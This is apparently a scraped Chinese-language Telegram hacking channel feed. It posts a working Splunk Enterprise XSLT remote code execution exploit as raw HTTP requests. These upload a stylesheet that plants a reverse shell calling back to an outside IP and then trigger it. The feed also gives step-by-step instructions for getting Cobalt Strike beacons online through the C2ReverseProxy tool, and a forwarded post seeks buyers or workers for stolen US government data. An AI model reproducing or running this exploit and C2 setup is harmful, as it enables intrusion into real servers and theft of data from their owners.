NEW BOT Телеграм, страница

Channel photo updated

00:59

Channel name was changed to «攻其阴睾制作组全球粉丝后援会»

00:59

Splunk Enterprise XML Parsing 远程代码执行漏洞

上传文件

POST /en-US/splunkd/__upload/indexing/preview?output_mode=json&props.NO_BINARY_CHECK=1&input.path=shell.xsl HTTP/1.1Host: 10.211.55.3:8000User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/119.0Accept-Encoding: gzip, deflateAccept: text/javanoscript, text/html, application/xml, text/xml, */*Connection: keep-aliveX-Requested-With: XMLHttpRequestX-Splunk-Form-Key: 14405369367646981099Cookie: session_id_8000=a74248449dd62e179dd17c05239d79708108da5f; splunkd_8000=O8DQPrZvhze8hbm7y^q^hgThhqSnx5RNXWEw7FU1lUbFUKO03x5n_DiqI0^m36KB2MZvtQxQpR^kgDUHFbcrxW4avet7juFQKvzaRbBDgARHZiZFqNiLaByswQCKCHIYmC; splunkweb_csrf_token_8000=14405369367646981099Content-Length: 620Content-Type: multipart/form-data; boundary=3d5f09288540918f033268ff6bceb049--3d5f09288540918f033268ff6bceb049Content-Disposition: form-data; name="spl-file"; filename="shell.xsl"Content-Type: application/xslt+xml<?xml version="1.0" encoding="UTF-8"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl"> <xsl:template match="/"> <exsl:document href="/opt/splunk/bin/noscripts/shell.sh" method="text"> <xsl:text>sh -i >& /dev/tcp/8.8.8.8/12388 0>&1</xsl:text> </exsl:document> </xsl:template></xsl:stylesheet>--3d5f09288540918f033268ff6bceb049--

解析文件

GET /en-US/api/search/jobs/1700617012.37/results?xsl=/opt/splunk/var/run/splunk/dispatch/1700617012.36/shell.xsl HTTP/1.1Host: 10.211.55.3:8000User-Agent: python-requests/2.31.0Accept-Encoding: gzip, deflateAccept: */*Connection: keep-aliveCookie: session_id_8000=a74248449dd62e179dd17c05239d79708108da5f; splunkd_8000=O8DQPrZvhze8hbm7y^q^hgThhqSnx5RNXWEw7FU1lUbFUKO03x5n_DiqI0^m36KB2MZvtQxQpR^kgDUHFbcrxW4avet7juFQKvzaRbBDgARHZiZFqNiLaByswQCKCHIYmC; splunkweb_csrf_token_8000=14405369367646981099

👍2

1.84K views04:58

踹哈公寓

Forwarded from xnx tobobo

收美国政府数据最低要求部委

最高预算50万美元

另外部门招人请投你的简历只要你够优秀
成员包括世界大赛冠军
年工资30万美元
安排远程面试
最低要求oscp证书以上

👍4

1.85K views12:32

踹哈公寓

疑似超级无敌至尊黑客offense二代出现

1.8K views12:33

踹哈公寓

法环，启动！

1.82K views08:05

1.68K views07:25

1.76K views07:26

【四年的鏖战，在今天画上句号，而正义的执行才刚刚开始-哔哩哔哩】 https://b23.tv/KVf1Pnz

乐😆乐😆乐🤪智识的欲望🤣
狂喜😃，灿若黄金！🍾🍾🍾
哎你怎么似了🤣

Bilibili

四年的鏖战，在今天画上句号，而正义的执行才刚刚开始_哔哩哔哩bilibili_明日方舟

简介：陆某是主祭本人
曾某是主祭的跟班
马某网名是巅峰小马，公开了；更多实用攻略教学，爆笑沙雕集锦，你所不知道的游戏知识，热门游戏视频7*24小时持续更新,尽在哔哩哔哩bilibili 视频播放量 545719、弹幕量 682、点赞数 24045、投硬币枚数 8113、收藏人数 3841、转发人数 3270, 视频作者让你爱上学习, 作者简介尊重，尊重，尊重
舟末八点半录播请关注@这个河神有话想说，相关视频：净网联盟急了，来自十年前的子弹正中眉心，此刻教育正式闭环，因为主祭被抓后消息暴露，米哈游的罗…

1.68K viewsedited 13:37

踹哈公寓

一款可以在不出网的环境下进行反向代理及cs上线的工具

C2ReverseProxy

ReverseProxy C2 - 在不出网的情况下使cs上线

使用步骤：
1、将C2noscript目录下的对应文件，如proxy.php 以及C2ReverseServer上传到目标服务器。
2、使用C2ReverseServer建立监听端口：
./C2ReverseServer (默认为64535)
3、修改C2noscript目录下对应文件的PORT，与C2ReverseServer监听的端口一致。
4、本地或C2服务器上运行C2ReverseClint工具
./C2ReverseClint -t C2IP:C2ListenerPort -u Example Domain (传送到目标服务器上的proxy.php路径)
5、使用CobaltStrike建立本地Listener(127.0.0.1 64535)端口与C2ReverseServer建立的端口对应
6、使用建立的Listner生成可执行文件beacon.exe传至目标服务器运行
7、可以看到CobaltStrike上线。

👍3❤1

1.81K views02:17

踹哈公寓

C2ReverseProxy-master.zip

7.9 KB

1.81K views02:18

踹哈公寓